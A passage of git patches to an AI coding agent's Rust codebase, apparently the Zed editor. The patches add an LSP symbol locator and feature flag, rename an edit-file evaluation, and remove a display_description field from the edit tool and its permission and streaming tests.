VecDeque = VecDeque::with_capacity(needle_chars.len()); + let mut byte_offsets: VecDeque = VecDeque::with_capacity(needle_chars.len()); + let mut byte_offset = 0usize; + + for ch in chars { + window.push_back(ch); + byte_offsets.push_back(byte_offset); + byte_offset += ch.len_utf8(); + + if window.len() > needle_chars.len() { + window.pop_front(); + byte_offsets.pop_front(); + } + + if window.len() == needle_chars.len() + && window.iter().zip(needle_chars.iter()).all(|(a, b)| a == b) + { + return byte_offsets.front().copied(); + } + } + + None +} + +impl SymbolLocator { + /// Resolves this locator into a concrete buffer and position. + /// + /// Opens the file at `file_path`, then searches for `symbol_name` on the + /// specified `line`. Returns an error if the file can't be found, the line + /// is out of range, or the symbol name doesn't appear on that line. + /// If the symbol name appears multiple times on the line, uses the first + /// occurrence. + pub async fn resolve( + &self, + project: &Entity, + cx: &mut AsyncApp, + ) -> Result { + let Self { + file_path, + line, + symbol_name, + } = self; + + let open_buffer_task = project.update(cx, |project, cx| { + let Some(project_path) = project.find_project_path(file_path, cx) else { + return Err(format!("Could not find path '{file_path}' in project",)); + }; + Ok(project.open_buffer(project_path, cx)) + })?; + + let buffer = open_buffer_task + .await + .map_err(|e| format!("Failed to open '{}': {e}", self.file_path))?; + + let (position, line_text, truncated) = buffer.read_with(cx, |buffer, _cx| { + let snapshot = buffer.snapshot(); + let row = line.saturating_sub(1); + + if row > snapshot.max_point().row { + let line_count = snapshot.max_point().row + 1; + return Err(format!( + "Line {line} is beyond the end of '{file_path}' (file has {line_count} lines)", + )); + } + + let line_len = snapshot.line_len(row); + let truncated = line_len as usize > MAX_LINE_DISPLAY_LEN; + let line_start = Point::new(row, 0); + let line_end = Point::new(row, line_len); + let line_chars = || { + snapshot + .text_for_range(line_start..line_end) + .flat_map(|chunk| chunk.chars()) + }; + + let byte_offset = find_in_char_iter(line_chars(), symbol_name).ok_or_else(|| { + let preview: String = line_chars() + .skip_while(|c| c.is_whitespace()) + .take(MAX_LINE_DISPLAY_LEN) + .collect(); + format!( + "Symbol '{symbol_name}' not found on line {line} of '{file_path}'. \ + Line content: '{}'", + preview.trim_end() + ) + })?; + + let position = snapshot.anchor_before(Point::new(row, byte_offset as u32)); + let display_text: String = line_chars() + .skip_while(|c| c.is_whitespace()) + .take(MAX_LINE_DISPLAY_LEN) + .collect::(); + let display_text = display_text.trim_end().to_string(); + + Ok((position, display_text, truncated)) + })?; + + Ok(ResolvedSymbol { + buffer, + position, + line_text, + truncated, + }) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use gpui::proptest::prelude::*; + + #[gpui::property_test] + fn find_in_char_iter_test( + // limited character sets to increase odds of finding matches + #[strategy = "[abcd]{100,1000}"] haystack: String, + #[strategy = "[abcd]{1,5}"] needle: String, + ) -> Result<(), TestCaseError> { + let expected = haystack.find(&needle); + let actual = find_in_char_iter(haystack.chars(), &needle); + prop_assert_eq!(actual, expected); + Ok::<_, TestCaseError>(()) + } +} diff --git a/crates/feature_flags/src/flags.rs b/crates/feature_flags/src/flags.rs index 56e3d135d9ee75..d9af542efeabec 100644 --- a/crates/feature_flags/src/flags.rs +++ b/crates/feature_flags/src/flags.rs @@ -59,6 +59,18 @@ impl FeatureFlag for UpdatePlanToolFeatureFlag { } register_feature_flag!(UpdatePlanToolFeatureFlag); +pub struct LspToolFeatureFlag; + +impl FeatureFlag for LspToolFeatureFlag { + const NAME: &'static str = "lsp-tool"; + type Value = PresenceFlag; + + fn enabled_for_staff() -> bool { + false + } +} +register_feature_flag!(LspToolFeatureFlag); + pub struct ProjectPanelUndoRedoFeatureFlag; impl FeatureFlag for ProjectPanelUndoRedoFeatureFlag { diff --git a/crates/gpui/src/test.rs b/crates/gpui/src/test.rs index 9f224871330d90..a93424edeab601 100644 --- a/crates/gpui/src/test.rs +++ b/crates/gpui/src/test.rs @@ -71,16 +71,20 @@ pub fn apply_seed_to_proptest_config( /// /// Doesn't support many features of [`run_test`], since these are provided by /// proptest. -pub fn run_test_once(seed: u64, test_fn: Box) { +pub fn run_test_once( + seed: u64, + test_fn: Box R>, +) -> R { let result = panic::catch_unwind(|| { let dispatcher = TestDispatcher::new(seed); let scheduler = dispatcher.scheduler().clone(); - test_fn(dispatcher); + let res = test_fn(dispatcher); scheduler.end_test(); + res }); match result { - Ok(()) => {} + Ok(r) => r, Err(e) => panic::resume_unwind(e), } } diff --git a/crates/settings_ui/src/pages/tool_permissions_setup.rs b/crates/settings_ui/src/pages/tool_permissions_setup.rs index e6b49dd6c8ab27..12693cb99d98fc 100644 --- a/crates/settings_ui/src/pages/tool_permissions_setup.rs +++ b/crates/settings_ui/src/pages/tool_permissions_setup.rs @@ -1407,13 +1407,18 @@ mod tests { // 2. Add it to this list with a comment explaining why it's excluded. const EXCLUDED_TOOLS: &[&str] = &[ // Read-only / low-risk tools that don't call decide_permission_from_settings + "apply_code_action", "diagnostics", "find_path", + "find_references", + "get_code_actions", + "go_to_definition", "grep", "list_directory", "now", "open", "read_file", + "rename_symbol", "thinking", // streaming_edit_file uses "edit_file" for permission lookups, // so its rules are configured under the edit_file entry. From b3af1dc4df879f80b023efb5c08830755e744f81 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Tue, 5 May 2026 11:58:05 +0200 Subject: [PATCH 187/231] agent: Cleanup edit_file evals (#55750) - Rename `streaming_edit_file` to `edit_file` - Remove workaround for replacing old edit tool with streaming edit file tool Release Notes: - N/A --- crates/agent/src/tools/evals.rs | 2 +- .../{streaming_edit_file.rs => edit_file.rs} | 50 +++++-------------- 2 files changed, 14 insertions(+), 38 deletions(-) rename crates/agent/src/tools/evals/{streaming_edit_file.rs => edit_file.rs} (96%) diff --git a/crates/agent/src/tools/evals.rs b/crates/agent/src/tools/evals.rs index 13b8413de6455c..b5d9f47ea5def0 100644 --- a/crates/agent/src/tools/evals.rs +++ b/crates/agent/src/tools/evals.rs @@ -1,2 +1,2 @@ #[cfg(all(test, feature = "unit-eval"))] -mod streaming_edit_file; +mod edit_file; diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/edit_file.rs similarity index 96% rename from crates/agent/src/tools/evals/streaming_edit_file.rs rename to crates/agent/src/tools/evals/edit_file.rs index 770e1f0effc2ab..cce9f41c6efd8d 100644 --- a/crates/agent/src/tools/evals/streaming_edit_file.rs +++ b/crates/agent/src/tools/evals/edit_file.rs @@ -15,9 +15,8 @@ use language::language_settings::FormatOnSave; use language_model::{ LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, - LanguageModelRequestTool, LanguageModelToolResult, LanguageModelToolResultContent, - LanguageModelToolSchemaFormat, LanguageModelToolUse, LanguageModelToolUseId, MessageContent, - Role, SelectedModel, + LanguageModelToolResult, LanguageModelToolResultContent, LanguageModelToolUse, + LanguageModelToolUseId, MessageContent, Role, SelectedModel, }; use project::Project; use prompt_store::{ProjectContext, WorktreeContext}; @@ -218,12 +217,12 @@ impl EvalAssertion { } #[derive(Clone)] -struct StreamingEditEvalOutput { +struct EditEvalOutput { sample: EvalSample, assertion: EvalAssertionOutcome, } -impl Display for StreamingEditEvalOutput { +impl Display for EditEvalOutput { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { writeln!(f, "Score: {:?}", self.assertion.score)?; if let Some(message) = self.assertion.message.as_ref() { @@ -241,7 +240,7 @@ struct EvalAssertionOutcome { message: Option, } -struct StreamingEditToolTest { +struct EditToolTest { fs: Arc, project: Entity, model: Arc, @@ -249,7 +248,7 @@ struct StreamingEditToolTest { model_thinking_effort: Option, } -impl StreamingEditToolTest { +impl EditToolTest { async fn new(cx: &mut TestAppContext) -> Self { cx.executor().allow_parking(); @@ -349,29 +348,7 @@ impl StreamingEditToolTest { })) } - /// Build the tool definitions for the model, replacing `edit_file` with the - /// streaming edit file tool schema. In production the streaming tool is - /// exposed under the name `"edit_file"` (see `Thread::enabled_tools`), so - /// the model has never seen the name `"streaming_edit_file"`. - fn build_tools() -> Vec { - let mut tools: Vec = crate::built_in_tools() - .filter(|tool| tool.name != EditFileTool::NAME) - .collect(); - tools.push(LanguageModelRequestTool { - name: EditFileTool::NAME.to_string(), - description: EditFileTool::description().to_string(), - input_schema: EditFileTool::input_schema(LanguageModelToolSchemaFormat::JsonSchema) - .to_value(), - use_input_streaming: EditFileTool::supports_input_streaming(), - }); - tools - } - - async fn eval( - &self, - mut eval: EvalInput, - cx: &mut TestAppContext, - ) -> Result { + async fn eval(&self, mut eval: EvalInput, cx: &mut TestAppContext) -> Result { eval.conversation .last_mut() .context("Conversation must not be empty")? @@ -391,7 +368,7 @@ impl StreamingEditToolTest { cx.run_until_parked(); } - let tools = Self::build_tools(); + let tools = crate::built_in_tools().collect::>(); let system_prompt = { let worktrees = vec![WorktreeContext { @@ -440,7 +417,7 @@ impl StreamingEditToolTest { }; // The model will call the tool as "edit_file" (the production-visible - // name), but the schema is from StreamingEditFileTool. + // name), but the schema is from EditFileTool. let tool_input = retry_on_rate_limit(async || self.extract_tool_use(request.clone(), cx).await).await?; @@ -505,12 +482,11 @@ impl StreamingEditToolTest { .run(&sample, self.judge_model.clone(), cx) .await?; - Ok(StreamingEditEvalOutput { assertion, sample }) + Ok(EditEvalOutput { assertion, sample }) } /// Stream the model completion and extract the first complete tool use - /// whose name matches `EditFileTool::NAME` (the production-visible name - /// for the streaming edit tool), parsed as `StreamingEditFileToolInput`. + /// whose name matches `EditFileTool::NAME`, parsed as `EditFileToolInput`. async fn extract_tool_use( &self, request: LanguageModelRequest, @@ -538,7 +514,7 @@ impl StreamingEditToolTest { && tool_use.name.as_ref() == EditFileTool::NAME => { let input: EditFileToolInput = serde_json::from_value(tool_use.input) - .context("Failed to parse tool input as StreamingEditFileToolInput")?; + .context("Failed to parse tool input as EditFileToolInput")?; return Ok(input); } Ok(LanguageModelCompletionEvent::Text(text)) => { @@ -590,7 +566,7 @@ fn run_eval(eval: EvalInput) -> eval_utils::EvalOutput<()> { let mut cx = TestAppContext::build(dispatcher, None); let foreground_executor = cx.foreground_executor().clone(); let result = foreground_executor.block_test(async { - let test = StreamingEditToolTest::new(&mut cx).await; + let test = EditToolTest::new(&mut cx).await; let result = test.eval(eval, &mut cx).await; drop(test); cx.run_until_parked(); From a191e995e1f4960d9170d26ebb769a7ab566f3c2 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Tue, 5 May 2026 14:11:24 +0200 Subject: [PATCH 188/231] agent: Remove `display_description` from edit tool (#55752) We did not really use it in practice (we would only display it in the tool card header until we received a path), so as is it just wastes tokens. Therefore removing it. Release Notes: - agent: Reduce token usage when LLM edits file --- crates/agent/src/tests/mod.rs | 3 - crates/agent/src/tools/edit_file_tool.rs | 298 ++++----------------- crates/agent/src/tools/tool_permissions.rs | 13 +- 3 files changed, 51 insertions(+), 263 deletions(-) diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index c2efda7673d6aa..2a4e9c255fb3ce 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -6061,7 +6061,6 @@ async fn test_edit_file_tool_deny_rule_blocks_edit(cx: &mut TestAppContext) { let task = cx.update(|cx| { tool.run( ToolInput::resolved(crate::EditFileToolInput { - display_description: "Edit sensitive file".to_string(), path: "root/sensitive_config.txt".into(), mode: crate::EditFileMode::Edit, content: None, @@ -6496,7 +6495,6 @@ async fn test_edit_file_tool_allow_rule_skips_confirmation(cx: &mut TestAppConte let _task = cx.update(|cx| { tool.run( ToolInput::resolved(crate::EditFileToolInput { - display_description: "Edit README".to_string(), path: "root/README.md".into(), mode: crate::EditFileMode::Edit, content: None, @@ -6569,7 +6567,6 @@ async fn test_edit_file_tool_allow_still_prompts_for_local_settings(cx: &mut Tes let _task = cx.update(|cx| { tool.run( ToolInput::resolved(crate::EditFileToolInput { - display_description: "Edit local settings".to_string(), path: "root/.zed/settings.json".into(), mode: crate::EditFileMode::Edit, content: None, diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index a51e9883224a69..0e6493953c95ce 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -49,18 +49,6 @@ const DEFAULT_UI_TEXT: &str = "Editing file"; /// - Use the `list_directory` tool to verify the parent directory exists and is the correct location #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct EditFileToolInput { - /// A one-line, user-friendly markdown description of the edit. This will be shown in the UI. - /// - /// Be terse, but also descriptive in what you want to achieve with this edit. Avoid generic instructions. - /// - /// NEVER mention the file path in this description. - /// - /// Fix API endpoint URLs - /// Update copyright year in `page_footer` - /// - /// Make sure to include this field before all the others in the input object so that we can display it immediately. - pub display_description: String, - /// The full path of the file to create or modify in the project. /// /// WARNING: When specifying which file path need changing, you MUST start each path with one of the project's root directories. @@ -131,8 +119,6 @@ pub struct Edit { #[derive(Clone, Default, Debug, Deserialize)] struct EditFileToolPartialInput { - #[serde(default)] - display_description: Option, #[serde(default)] path: Option, #[serde(default, deserialize_with = "deserialize_maybe_stringified")] @@ -278,14 +264,12 @@ impl EditFileTool { fn authorize( &self, path: &PathBuf, - description: &str, event_stream: &ToolCallEventStream, cx: &mut App, ) -> Task> { super::tool_permissions::authorize_file_edit( EditFileTool::NAME, path, - description, &self.thread, event_stream, cx, @@ -360,14 +344,12 @@ impl EditFileTool { && path_complete && let EditFileToolPartialInput { path: Some(path), - display_description: Some(display_description), mode: Some(mode), .. } = &parsed { match EditSession::new( PathBuf::from(path), - display_description, *mode, self, event_stream, @@ -400,7 +382,6 @@ impl EditFileTool { } else { match EditSession::new( full_input.path.clone(), - &full_input.display_description, full_input.mode, self, event_stream, @@ -505,12 +486,6 @@ impl AgentTool for EditFileTool { .unwrap_or_else(|| path.to_string()) .into(); } - - let description = input.display_description.unwrap_or_default(); - let description = description.trim(); - if !description.is_empty() { - return description.to_string().into(); - } } DEFAULT_UI_TEXT.into() @@ -881,7 +856,6 @@ impl EditPipeline { impl EditSession { async fn new( path: PathBuf, - display_description: &str, mode: EditFileMode, tool: &EditFileTool, event_stream: &ToolCallEventStream, @@ -901,7 +875,7 @@ impl EditSession { ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), ); - cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) + cx.update(|cx| tool.authorize(&path, event_stream, cx)) .await .map_err(|e| e.to_string())?; @@ -1296,7 +1270,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Create new file".into(), path: "root/dir/new_file.txt".into(), mode: EditFileMode::Write, content: Some("Hello, World!".into()), @@ -1323,7 +1296,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Overwrite file".into(), path: "root/file.txt".into(), mode: EditFileMode::Write, content: Some("new content".into()), @@ -1353,7 +1325,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit lines".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1385,7 +1356,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit multiple lines".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1426,7 +1396,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit adjacent lines".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1467,7 +1436,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit multiple lines in ascending order".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1504,7 +1472,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Some edit".into(), path: "root/nonexistent_file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1540,7 +1507,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit file".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1573,18 +1539,16 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send partials simulating LLM streaming: description first, then path, then mode - sender.send_partial(json!({"display_description": "Edit lines"})); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt" })); cx.run_until_parked(); // Path is NOT yet complete because mode hasn't appeared — no buffer open yet sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit" })); @@ -1592,7 +1556,6 @@ mod tests { // Now send the final complete input sender.send_full(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] @@ -1615,14 +1578,12 @@ mod tests { // Send partial with path but NO mode — path should NOT be treated as complete sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file" })); cx.run_until_parked(); // Now the path grows and mode appears sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write" })); @@ -1630,7 +1591,6 @@ mod tests { // Send final sender.send_full(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new content" @@ -1653,7 +1613,7 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send a partial - sender.send_partial(json!({"display_description": "Edit"})); + sender.send_partial(json!({})); cx.run_until_parked(); // Cancel during streaming @@ -1686,24 +1646,21 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Simulate fine-grained streaming of the JSON - sender.send_partial(json!({"display_description": "Edit multiple"})); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 1"}] @@ -1711,7 +1668,6 @@ mod tests { cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1723,7 +1679,6 @@ mod tests { // Send final complete input sender.send_full(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1750,18 +1705,16 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Stream partials for create mode - sender.send_partial(json!({"display_description": "Create new file"})); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "Hello, " @@ -1770,7 +1723,6 @@ mod tests { // Final with full content sender.send_full(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "Hello, World!" @@ -1793,7 +1745,6 @@ mod tests { // Send final immediately with no partials (simulates non-streaming path) sender.send_full(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] @@ -1818,11 +1769,10 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Stream description, path, mode - sender.send_partial(json!({"display_description": "Edit multiple lines"})); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit" })); @@ -1830,7 +1780,6 @@ mod tests { // First edit starts streaming (old_text only, still in progress) sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 1"}] @@ -1857,7 +1806,6 @@ mod tests { // Second edit appears — this proves the first edit is complete, so it // should be applied immediately during streaming sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1884,7 +1832,6 @@ mod tests { // Send final complete input sender.send_full(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1917,7 +1864,6 @@ mod tests { // Setup: description + path + mode sender.send_partial(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit" })); @@ -1925,7 +1871,6 @@ mod tests { // Edit 1 in progress sender.send_partial(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "aaa", "new_text": "AAA"}] @@ -1934,7 +1879,6 @@ mod tests { // Edit 2 appears — edit 1 is now complete and should be applied sender.send_partial(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1957,7 +1901,6 @@ mod tests { // Edit 3 appears — edit 2 is now complete and should be applied sender.send_partial(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1980,7 +1923,6 @@ mod tests { // Send final sender.send_full(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -2007,7 +1949,6 @@ mod tests { // Setup sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit" })); @@ -2015,7 +1956,6 @@ mod tests { // Edit 1 (valid) in progress — not yet complete (no second edit) sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -2027,7 +1967,6 @@ mod tests { // Edit 2 appears (will fail to match) — this makes edit 1 complete. // Edit 1 should be applied. Edit 2 is still in-progress (last edit). sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -2054,7 +1993,6 @@ mod tests { // Edit 3 appears — this makes edit 2 "complete", triggering its // resolution which should fail (old_text doesn't exist in the file). sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -2101,14 +2039,12 @@ mod tests { // Setup + single edit that stays in-progress (no second edit to prove completion) sender.send_partial(json!({ - "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] @@ -2133,7 +2069,6 @@ mod tests { // Send final — the edit is applied during finalization sender.send_full(json!({ - "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] @@ -2156,20 +2091,16 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send progressively more complete partial snapshots, as the LLM would - sender.send_partial(json!({ - "display_description": "Edit lines" - })); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] @@ -2178,7 +2109,6 @@ mod tests { // Send the final complete input sender.send_full(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] @@ -2201,9 +2131,7 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send a partial then drop the sender without sending final - sender.send_partial(json!({ - "display_description": "Edit file" - })); + sender.send_partial(json!({})); cx.run_until_parked(); drop(sender); @@ -2227,15 +2155,13 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Buffer several partials before sending the final - sender.send_partial(json!({"display_description": "Create"})); - sender.send_partial(json!({"display_description": "Create", "path": "root/dir/new.txt"})); + sender.send_partial(json!({})); + sender.send_partial(json!({"path": "root/dir/new.txt"})); sender.send_partial(json!({ - "display_description": "Create", "path": "root/dir/new.txt", "mode": "write" })); sender.send_full(json!({ - "display_description": "Create", "path": "root/dir/new.txt", "mode": "write", "content": "streamed content" @@ -2419,14 +2345,12 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Create main function", "path": "root/src/main.rs", "mode": "write" })); cx.run_until_parked(); sender.send_full(json!({ - "display_description": "Create main function", "path": "root/src/main.rs", "mode": "write", "content": UNFORMATTED_CONTENT @@ -2477,14 +2401,12 @@ mod tests { let task = cx.update(|cx| tool2.run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Update main function", "path": "root/src/main.rs", "mode": "write" })); cx.run_until_parked(); sender.send_full(json!({ - "display_description": "Update main function", "path": "root/src/main.rs", "mode": "write", "content": UNFORMATTED_CONTENT @@ -2540,7 +2462,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Create main function".into(), path: "root/src/main.rs".into(), mode: EditFileMode::Write, content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), @@ -2588,7 +2509,6 @@ mod tests { .update(|cx| { tool2.run( ToolInput::resolved(EditFileToolInput { - display_description: "Update main function".into(), path: "root/src/main.rs".into(), mode: EditFileMode::Write, content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), @@ -2617,52 +2537,40 @@ mod tests { // Test 1: Path with .zed component should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from(".zed/settings.json"), - "test 1", - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from(".zed/settings.json"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!( event.tool_call.fields.title, - Some("test 1 (local settings)".into()) + Some("Edit `.zed/settings.json` (local settings)".into()) ); // Test 2: Path outside project should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = - cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 2", &stream_tx, cx)); + let _auth = cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; - assert_eq!(event.tool_call.fields.title, Some("test 2".into())); + assert_eq!( + event.tool_call.fields.title, + Some("Edit `/etc/hosts`".into()) + ); // Test 3: Relative path without .zed should not require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize(&PathBuf::from("root/src/main.rs"), "test 3", &stream_tx, cx) - }) - .await - .unwrap(); + cx.update(|cx| tool.authorize(&PathBuf::from("root/src/main.rs"), &stream_tx, cx)) + .await + .unwrap(); assert!(stream_rx.try_recv().is_err()); // Test 4: Path with .zed in the middle should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("root/.zed/tasks.json"), - "test 4", - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from("root/.zed/tasks.json"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!( event.tool_call.fields.title, - Some("test 4 (local settings)".into()) + Some("Edit `root/.zed/tasks.json` (local settings)".into()) ); // Test 5: When global default is allow, sensitive and outside-project @@ -2675,39 +2583,26 @@ mod tests { // 5.1: .zed/settings.json is a sensitive path — still prompts let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from(".zed/settings.json"), - "test 5.1", - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from(".zed/settings.json"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!( event.tool_call.fields.title, - Some("test 5.1 (local settings)".into()) + Some("Edit `.zed/settings.json` (local settings)".into()) ); // 5.2: /etc/hosts is outside the project, but Allow auto-approves let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.2", &stream_tx, cx)) + cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), &stream_tx, cx)) .await .unwrap(); assert!(stream_rx.try_recv().is_err()); // 5.3: Normal in-project path with allow — no confirmation needed let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &PathBuf::from("root/src/main.rs"), - "test 5.3", - &stream_tx, - cx, - ) - }) - .await - .unwrap(); + cx.update(|cx| tool.authorize(&PathBuf::from("root/src/main.rs"), &stream_tx, cx)) + .await + .unwrap(); assert!(stream_rx.try_recv().is_err()); // 5.4: With Confirm default, non-project paths still prompt @@ -2718,11 +2613,13 @@ mod tests { }); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx - .update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.4", &stream_tx, cx)); + let _auth = cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; - assert_eq!(event.tool_call.fields.title, Some("test 5.4".into())); + assert_eq!( + event.tool_call.fields.title, + Some("Edit `/etc/hosts`".into()) + ); } #[gpui::test] @@ -2744,14 +2641,8 @@ mod tests { }); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let authorize_task = cx.update(|cx| { - tool.authorize( - &PathBuf::from("link/new.txt"), - "create through symlink", - &stream_tx, - cx, - ) - }); + let authorize_task = + cx.update(|cx| tool.authorize(&PathBuf::from("link/new.txt"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert!( @@ -2808,7 +2699,6 @@ mod tests { let _authorize_task = 